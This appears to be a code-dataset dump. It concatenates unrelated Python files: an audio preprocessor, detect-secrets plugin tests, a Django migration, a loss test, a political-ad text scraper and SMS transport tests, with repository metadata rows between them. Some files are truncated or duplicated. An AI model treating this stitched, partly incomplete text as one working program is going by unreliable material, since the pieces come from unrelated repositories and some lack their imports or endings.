import numpy as np
from tqdm import tqdm
import audio as Audio
from text import grapheme_to_phoneme
from utils.tools import read_lexicon
from g2p_en import G2p
random.seed(1234)
class Preprocessor:
def __init__(self, config):
self.config = config
self.in_dir = config["path"]["raw_path"]
self.out_dir = config["path"]["preprocessed_path"]
self.val_size = config["preprocessing"]["val_size"]
self.sampling_rate = config["preprocessing"]["audio"]["sampling_rate"]
self.skip_len = config["preprocessing"]["audio"]["skip_len"]
self.trim_top_db = config["preprocessing"]["audio"]["trim_top_db"]
self.filter_length = config["preprocessing"]["stft"]["filter_length"]
self.hop_length = config["preprocessing"]["stft"]["hop_length"]
self.g2p = G2p()
self.lexicon = read_lexicon(config["path"]["lexicon_path"])
self.STFT = Audio.stft.TacotronSTFT(
config["preprocessing"]["stft"]["filter_length"],
config["preprocessing"]["stft"]["hop_length"],
config["preprocessing"]["stft"]["win_length"],
config["preprocessing"]["mel"]["n_mel_channels"],
config["preprocessing"]["audio"]["sampling_rate"],
config["preprocessing"]["mel"]["mel_fmin"],
config["preprocessing"]["mel"]["mel_fmax"],
)
def build_from_path(self):
os.makedirs((os.path.join(self.out_dir, "mel")), exist_ok=True)
print("Processing Data ...")
out = list()
n_frames = 0
speakers = {}
for i, speaker in enumerate(tqdm(os.listdir(self.in_dir))):
speakers[speaker] = i
for wav_name in tqdm(os.listdir(os.path.join(self.in_dir, speaker))):
if ".wav" not in wav_name:
continue
basename = wav_name.split(".")[0]
ret = self.process_utterance(speaker, basename)
if ret is None:
continue
else:
info, n = ret
out.append(info)
n_frames += n
with open(os.path.join(self.out_dir, "speakers.json"), "w") as f:
f.write(json.dumps(speakers))
print(
"Total time: {} hours".format(
n_frames * self.hop_length / self.sampling_rate / 3600
)
)
random.shuffle(out)
out = [r for r in out if r is not None]
with open(os.path.join(self.out_dir, "train.txt"), "w", encoding="utf-8") as f:
for m in out[self.val_size :]:
f.write(m + "\n")
with open(os.path.join(self.out_dir, "val.txt"), "w", encoding="utf-8") as f:
for m in out[: self.val_size]:
f.write(m + "\n")
return out
def process_utterance(self, speaker, basename):
wav_path = os.path.join(self.in_dir, speaker, "{}.wav".format(basename))
text_path = os.path.join(self.in_dir, speaker, "{}.lab".format(basename))
wav, _ = librosa.load(wav_path)
wav = wav.astype(np.float32)
if len(wav) < self.skip_len:
return None
wav = librosa.effects.trim(wav, top_db=self.trim_top_db, frame_length=self.filter_length, hop_length=self.hop_length)[0]
mel_spectrogram, _ = Audio.stft.get_mel_spectrogram(self.STFT, wav)
mel_spectrogram = mel_spectrogram.squeeze(1).numpy()
with open(text_path, "r") as f:
raw_text = f.readline().strip("\n")
phone = grapheme_to_phoneme(raw_text, self.g2p, self.lexicon)
text = "{" + " ".join(phone) + "}"
mel_filename = "{}-mel-{}.npy".format(speaker, basename)
np.save(
os.path.join(self.out_dir, "mel", mel_filename),
mel_spectrogram.T,
)
return (
"|".join([basename, speaker, text, raw_text]),
mel_spectrogram.shape[1],
)
| true | true |
1c332e30c32aa1ed1f57437c220782a600b636df | 3,771 | py | Python | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2020-05-19T05:07:19.000Z | 2020-05-19T05:07:19.000Z | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2020-08-12T21:57:16.000Z | 2020-08-12T21:57:16.000Z | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2021-07-14T16:53:12.000Z | 2021-07-14T16:53:12.000Z | from contextlib import contextmanager
import mock
import pytest
from detect_secrets.core.constants import VerifiedResult
from detect_secrets.plugins.base import BasePlugin
from testing.factories import potential_secret_factory
from testing.mocks import mock_file_object
@pytest.mark.parametrize(
'name, expected',
(
('HexHighEntropyString', 'no-hex-high-entropy-string-scan'),
('KeywordDetector', 'no-keyword-scan'),
('PrivateKeyDetector', 'no-private-key-scan'),
),
)
def test_disable_flag_text(name, expected):
class MockPlugin(BasePlugin):
@property
def secret_type(self): # pragma: no cover
return ''
MockPlugin.__name__ = str(name)
assert MockPlugin.disable_flag_text == expected
class TestVerify:
@pytest.mark.parametrize(
'result, output',
(
(
VerifiedResult.UNVERIFIED,
'True (unverified)',
),
(
VerifiedResult.VERIFIED_FALSE,
'False (verified)',
),
(
VerifiedResult.VERIFIED_TRUE,
'True (verified)',
),
),
)
def test_adhoc_scan_values(self, result, output):
with self.create_test_plugin(result) as plugin:
assert plugin.adhoc_scan('test value') == output
def test_adhoc_scan_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
plugin.should_verify = False
assert plugin.adhoc_scan('test value') == 'True'
def test_analyze_verified_false_ignores_value(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert len(result) == 0
def test_analyze_verified_true_adds_intel(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert list(result.keys())[0].is_verified
def test_analyze_unverified_stays_the_same(self):
with self.create_test_plugin(VerifiedResult.UNVERIFIED) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert not list(result.keys())[0].is_verified
def test_analyze_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
plugin.should_verify = False
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
# If it is verified, this value should be 0.
assert len(result) == 1
@contextmanager
def create_test_plugin(self, result):
"""
:type result: VerifiedResult
"""
class MockPlugin(BasePlugin): # pragma: no cover
secret_type = 'test_verify'
def analyze_string_content(self, *args, **kwargs):
secret = potential_secret_factory()
return {
secret: secret,
}
def secret_generator(self, *args, **kwargs):
pass
def verify(self, *args, **kwargs):
return result
with mock.patch(
'detect_secrets.plugins.base.CodeSnippetHighlighter',
autospec=True,
) as mock_snippet:
plugin = MockPlugin()
plugin.should_verify = True
mock_snippet().get_code_snippet.return_value = ''
yield plugin
| 31.425 | 78 | 0.619464 | from contextlib import contextmanager
import mock
import pytest
from detect_secrets.core.constants import VerifiedResult
from detect_secrets.plugins.base import BasePlugin
from testing.factories import potential_secret_factory
from testing.mocks import mock_file_object
@pytest.mark.parametrize(
'name, expected',
(
('HexHighEntropyString', 'no-hex-high-entropy-string-scan'),
('KeywordDetector', 'no-keyword-scan'),
('PrivateKeyDetector', 'no-private-key-scan'),
),
)
def test_disable_flag_text(name, expected):
class MockPlugin(BasePlugin):
@property
def secret_type(self):
return ''
MockPlugin.__name__ = str(name)
assert MockPlugin.disable_flag_text == expected
class TestVerify:
@pytest.mark.parametrize(
'result, output',
(
(
VerifiedResult.UNVERIFIED,
'True (unverified)',
),
(
VerifiedResult.VERIFIED_FALSE,
'False (verified)',
),
(
VerifiedResult.VERIFIED_TRUE,
'True (verified)',
),
),
)
def test_adhoc_scan_values(self, result, output):
with self.create_test_plugin(result) as plugin:
assert plugin.adhoc_scan('test value') == output
def test_adhoc_scan_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
plugin.should_verify = False
assert plugin.adhoc_scan('test value') == 'True'
def test_analyze_verified_false_ignores_value(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert len(result) == 0
def test_analyze_verified_true_adds_intel(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert list(result.keys())[0].is_verified
def test_analyze_unverified_stays_the_same(self):
with self.create_test_plugin(VerifiedResult.UNVERIFIED) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert not list(result.keys())[0].is_verified
def test_analyze_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
plugin.should_verify = False
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert len(result) == 1
@contextmanager
def create_test_plugin(self, result):
class MockPlugin(BasePlugin):
secret_type = 'test_verify'
def analyze_string_content(self, *args, **kwargs):
secret = potential_secret_factory()
return {
secret: secret,
}
def secret_generator(self, *args, **kwargs):
pass
def verify(self, *args, **kwargs):
return result
with mock.patch(
'detect_secrets.plugins.base.CodeSnippetHighlighter',
autospec=True,
) as mock_snippet:
plugin = MockPlugin()
plugin.should_verify = True
mock_snippet().get_code_snippet.return_value = ''
yield plugin
| true | true |
1c332eadaeec91974c0a1e42791d552c367427f6 | 1,259 | py | Python | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | null | null | null | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | 15 | 2021-01-02T17:43:37.000Z | 2021-02-13T12:02:11.000Z | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-03-13 15:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='mentorprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentor'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentor', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='menteeprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentee'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentee', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='educonsultantprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Edu-Consultant'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_educonsultant', to=settings.AUTH_USER_MODEL),
),
]
| 37.029412 | 196 | 0.67355 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='mentorprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentor'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentor', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='menteeprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentee'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentee', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='educonsultantprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Edu-Consultant'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_educonsultant', to=settings.AUTH_USER_MODEL),
),
]
| true | true |
1c332eba54cf48ce209e84efa7ccdceb379fb0bc | 492 | py | Python | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | import tor4
import tor4.nn as nn
def test_mse_backward():
inputs = tor4.tensor(data=[1.0, 2, 3], requires_grad=True)
targets = tor4.tensor(data=[2, 3, 2])
mse_nn = nn.functional.mse_loss(inputs, targets)
mse = ((inputs - targets) ** 2).mean()
mse2 = nn.functional.mse_loss_slow(inputs, targets)
mse_nn.backward()
assert mse_nn.item() == mse.item() == mse2.item() == 1
assert mse_nn.requires_grad
assert inputs.grad.tolist() == [-2 / 3, -2 / 3, 2 / 3]
| 27.333333 | 62 | 0.634146 | import tor4
import tor4.nn as nn
def test_mse_backward():
inputs = tor4.tensor(data=[1.0, 2, 3], requires_grad=True)
targets = tor4.tensor(data=[2, 3, 2])
mse_nn = nn.functional.mse_loss(inputs, targets)
mse = ((inputs - targets) ** 2).mean()
mse2 = nn.functional.mse_loss_slow(inputs, targets)
mse_nn.backward()
assert mse_nn.item() == mse.item() == mse2.item() == 1
assert mse_nn.requires_grad
assert inputs.grad.tolist() == [-2 / 3, -2 / 3, 2 / 3]
| true | true |
1c332f66e37a34e84130c88451c698f9e98f4daa | 1,640 | py | Python | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | 1 | 2021-12-04T00:03:35.000Z | 2021-12-04T00:03:35.000Z | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | null | null | null | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | null | null | null | import requests
import simplejson as json
import scraperwiki
import time
# Text ad example https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id=AR117485875444580352&creative_id=CR113556358325862400&hl=en
def getFullAdText(ad_text_json):
full_text = ""
for thing in ad_text_json:
if type(thing) is str:
full_text = full_text + thing + "\n"
elif type(thing) is list:
for things in thing:
full_text = full_text + things + " "
full_text = full_text + "\n"
return full_text
def getAdText(ad_url):
url_split = ad_url.split("/")
ar_id = url_split[6]
cr_id = url_split[8]
# print(ar_id, cr_id)
ad_api_url = f"https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id={ar_id}&creative_id={cr_id}&hl=en"
print(ad_api_url)
ad_results = requests.get(ad_api_url)
results_text = ad_results.text.replace(")]}'","").strip()
ad_results_json = json.loads(results_text)
if len(ad_results_json[0][3]) == 0:
print("Removed?")
else:
ad_text_json = ad_results_json[0][3][3][8]
print(ad_text_json)
full_text = getFullAdText(ad_text_json)
print(full_text)
return full_text
def parseTextAds():
# queryString = "* from aus_ads where Ad_Type='Video' AND video_id IS NULL"
queryString = "* from aus_ads where Ad_Type='Text' AND ad_text IS NULL"
queryResult = scraperwiki.sqlite.select(queryString)
for row in queryResult:
# print(row)
row['ad_text'] = getAdText(row['Ad_URL'])
# print(row)
scraperwiki.sqlite.save(unique_keys=["Ad_ID"], data=row, table_name="aus_ads")
time.sleep(0.1)
parseTextAds() | 32.8 | 182 | 0.739634 | import requests
import simplejson as json
import scraperwiki
import time
def getFullAdText(ad_text_json):
full_text = ""
for thing in ad_text_json:
if type(thing) is str:
full_text = full_text + thing + "\n"
elif type(thing) is list:
for things in thing:
full_text = full_text + things + " "
full_text = full_text + "\n"
return full_text
def getAdText(ad_url):
url_split = ad_url.split("/")
ar_id = url_split[6]
cr_id = url_split[8]
ad_api_url = f"https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id={ar_id}&creative_id={cr_id}&hl=en"
print(ad_api_url)
ad_results = requests.get(ad_api_url)
results_text = ad_results.text.replace(")]}'","").strip()
ad_results_json = json.loads(results_text)
if len(ad_results_json[0][3]) == 0:
print("Removed?")
else:
ad_text_json = ad_results_json[0][3][3][8]
print(ad_text_json)
full_text = getFullAdText(ad_text_json)
print(full_text)
return full_text
def parseTextAds():
# queryString = "* from aus_ads where Ad_Type='Video' AND video_id IS NULL"
queryString = "* from aus_ads where Ad_Type='Text' AND ad_text IS NULL"
queryResult = scraperwiki.sqlite.select(queryString)
for row in queryResult:
# print(row)
row['ad_text'] = getAdText(row['Ad_URL'])
# print(row)
scraperwiki.sqlite.save(unique_keys=["Ad_ID"], data=row, table_name="aus_ads")
time.sleep(0.1)
parseTextAds() | true | true |
1c333086cd645f5e0478b97ef3ea91b87966bce8 | 12,641 | py | Python | vumi/transports/cellulant/tests/test_cellulant_sms.py | vishwaprakashmishra/xmatrix | aefdab7e2980748746c7fefcd75c965cea55466f | [
"BSD-3-Clause"
] | 1 | 2016-07-27T17:13:32.000Z | 2016-07-27T17:13:32.000Z | vumi/transports/cellulant/tests/test_cellulant_sms.py | TouK/vumi | 6d250c7039fa1d82b01c5b68722aa8a6a94580b2 | [
"BSD-3-Clause"
] | null | null | null | vumi/transports/cellulant/tests/test_cellulant_sms.py | TouK/vumi | 6d250c7039fa1d82b01c5b68722aa8a6a94580b2 | [
"BSD-3-Clause"
] | null | null | null | # -*- encoding: utf-8 -*-
import json
from urllib import urlencode
from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from vumi.utils import http_request, http_request_full
from vumi.tests.utils import MockHttpServer
from vumi.tests.helpers import VumiTestCase
from vumi.transports.cellulant import CellulantSmsTransport
from vumi.transports.tests.helpers import TransportHelper
class TestCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_health(self):
result = yield http_request(
self.transport_url + "health", "", method='GET')
self.assertEqual(json.loads(result), {'pending_requests': 0})
@inlineCallbacks
def test_inbound(self):
url = self.mkurl('hello')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_outbound(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567")
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_outbound_creds_selection(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='2371234567')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['user'],
'password': ['pass'],
'source': ['2371234567'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='9292')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_handle_non_ascii_input(self):
url = self.mkurl(u"öæł".encode("utf-8"))
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], u"öæł")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_bad_parameter(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'unexpected_parameter': ['foo']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
class TestAcksCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
self._mock_response = ''
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def mock_response(self, response):
self._mock_response = response
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return self._mock_response
@inlineCallbacks
def mock_event(self, msg, nr_events):
self.mock_response(msg)
yield self.tx_helper.make_dispatch_outbound(
"foo", to_addr='2371234567', message_id='id_%s' % (msg,))
yield self.cellulant_sms_calls.get()
events = yield self.tx_helper.wait_for_dispatched_events(nr_events)
returnValue(events)
@inlineCallbacks
def test_nack_param_error_E0(self):
[nack] = yield self.mock_event('E0', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E0')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E0'])
@inlineCallbacks
def test_nack_login_error_E1(self):
[nack] = yield self.mock_event('E1', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E1')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E1'])
@inlineCallbacks
def test_nack_credits_error_E2(self):
[nack] = yield self.mock_event('E2', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E2')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E2'])
@inlineCallbacks
def test_nack_delivery_failed_1005(self):
[nack] = yield self.mock_event('1005', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_1005')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['1005'])
@inlineCallbacks
def test_unknown_response(self):
[nack] = yield self.mock_event('something_unexpected', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_something_unexpected')
self.assertEqual(nack['nack_reason'],
'Unknown response code: something_unexpected')
@inlineCallbacks
def test_ack_success(self):
[event] = yield self.mock_event('1', 1)
self.assertEqual(event['event_type'], 'ack')
self.assertEqual(event['user_message_id'], 'id_1')
class TestPermissiveCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_bad_parameter_in_permissive_mode(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(200, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
| 37.622024 | 78 | 0.592596 |
import json
from urllib import urlencode
from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from vumi.utils import http_request, http_request_full
from vumi.tests.utils import MockHttpServer
from vumi.tests.helpers import VumiTestCase
from vumi.transports.cellulant import CellulantSmsTransport
from vumi.transports.tests.helpers import TransportHelper
class TestCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_health(self):
result = yield http_request(
self.transport_url + "health", "", method='GET')
self.assertEqual(json.loads(result), {'pending_requests': 0})
@inlineCallbacks
def test_inbound(self):
url = self.mkurl('hello')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_outbound(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567")
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_outbound_creds_selection(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='2371234567')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['user'],
'password': ['pass'],
'source': ['2371234567'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='9292')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_handle_non_ascii_input(self):
url = self.mkurl(u"öæł".encode("utf-8"))
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], u"öæł")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_bad_parameter(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'unexpected_parameter': ['foo']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
